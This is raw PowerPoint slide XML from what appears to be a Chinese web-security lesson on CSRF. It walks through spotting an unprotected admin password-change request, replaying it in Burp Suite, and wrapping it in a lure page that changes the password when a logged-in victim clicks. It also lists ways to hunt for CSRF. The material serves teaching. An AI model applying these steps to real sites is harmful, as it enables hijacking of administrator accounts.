              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>限</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>制</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>也无特殊限制</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>这时大致可以 判断，管理员密码修改功能可能存在</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>漏</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>洞</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1968125" y="3225835"/>
            <a:ext cx="52197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修改密</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-10" b="1">
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>码报</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-5" b="1">
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>文</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1058049" y="1891284"/>
            <a:ext cx="2543555" cy="1341881"/>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80276"/>
            <a:ext cx="3455670"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3</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Suite</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>进行请求重放，可以发现管理员密码被成功修改，如图所示。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2539879" y="2533812"/>
            <a:ext cx="85090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报文重</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-5" b="1">
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>放密码修改成功</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1534553" y="1115441"/>
            <a:ext cx="2959607" cy="1304543"/>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539125" y="1119251"/>
            <a:ext cx="2950210" cy="1296670"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2950210" h="1296670">
                <a:moveTo>
                  <a:pt x="0" y="1296162"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2949702" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2949702" y="1296162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1296162"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>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8</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80276"/>
            <a:ext cx="3326129" cy="23812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4</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）接下来构造诱惑链接。将管理员密码修改链接包装成如图所示的网</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>页</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，以 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>发送给用户并诱使用户访</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>问</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715397" y="1621001"/>
            <a:ext cx="2014855" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="36830" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1176020">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="290"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" b="1">
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>报文重</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-5" b="1">
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>放密码修改成功</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="229"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>而该链接的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>代码如</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>下</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1419986" y="1148207"/>
            <a:ext cx="1778507" cy="473963"/>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425321" y="1154303"/>
            <a:ext cx="1770380" cy="466725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1770380" h="466725">
                <a:moveTo>
                  <a:pt x="0" y="466344"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1770126" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1770126" y="466344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="466344"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="883551" y="2004695"/>
            <a:ext cx="3702557" cy="394715"/>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3364865" cy="340995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="19050" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="151130" marR="5080" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="96400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15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5</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>此时只要用户在保持着登录的状态下单击该链接，攻击者就可以成功修改 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>管理员密码，该链接被用户单击后的页面显示如图所示，图中用椭圆圈住的内容 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>说明密码已被修改。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2806579" y="3225073"/>
            <a:ext cx="52197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密码修</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-10" b="1">
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>改成</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-5" b="1">
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>功</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1971179" y="1741169"/>
            <a:ext cx="2153411" cy="1446276"/>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974989" y="1746504"/>
            <a:ext cx="2146935" cy="1436370"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2146935" h="1436370">
                <a:moveTo>
                  <a:pt x="0" y="1436370"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2146554" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2146554" y="1436370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1436370"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>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5"/>
            <a:ext cx="3380104" cy="1389380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="93980" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="740"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>查找</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="325"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>下面给出查找</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>漏洞的常见方</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>法</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" marR="5080" indent="-138430">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="275"/>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1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>对目标网站进行踩点，对增删改的地方进行标</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>记</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，并观察其逻辑。例 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>如修改管理员账号时不需要验证旧密</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>码</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>、提交留言的动作、关</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>注</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XX</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>微博的动 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>作等</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>等</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" marR="55244" indent="-138430">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="254"/>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2</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>提交操作</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>(GET/POST)</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>观察</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>头部的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
